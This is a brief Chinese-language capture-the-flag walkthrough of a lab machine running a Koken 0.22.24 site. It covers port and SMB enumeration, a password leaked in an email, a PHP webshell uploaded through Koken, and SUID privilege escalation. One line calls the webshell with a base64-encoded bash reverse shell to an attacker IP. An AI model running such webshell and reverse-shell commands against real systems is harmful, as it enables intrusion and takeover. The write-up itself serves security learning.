掃埠
埠漏洞
80 埠 資訊收集:
兩個賬號資訊
v1n1v131r4
templated
dirsearch 進行目錄掃描
/assets
/*main.js*/
/*
Hielo by TEMPLATED
templated.co @templatedco
Released for free under the Creative Commons Attribution 3.0 license (templated.co/license)
*/
新增域名解析
172.16.33.88 templated.co
8000 埠 資訊收集:
koken 搭建的站點,版本號0.22.24
/admin 登入口,需要郵箱和密碼登入
smb服務資訊收集
獲取共享檔案
獲取共享資料夾
Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <agi@photographer.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <daisa@photographer.com>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)
賬號:daisa@photographer.com
密碼:babygirl
成功登入8000埠服務
獲取許可權
koken搭建的站點
檢視是否存在漏洞
該txt闡述瞭如何利用koken上傳木馬
訪問
172.16.33.88:8000/storage/originals/48/02/test.php?cmd=echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjguMC4xNjUvNTU1NSAwPiYx|%20base64%20-d|/bin/bash%20-i
# base64 加密
# 加密內容為經典反彈shell
拿shell
提權
上述有suid許可權的可執行檔案
成功提權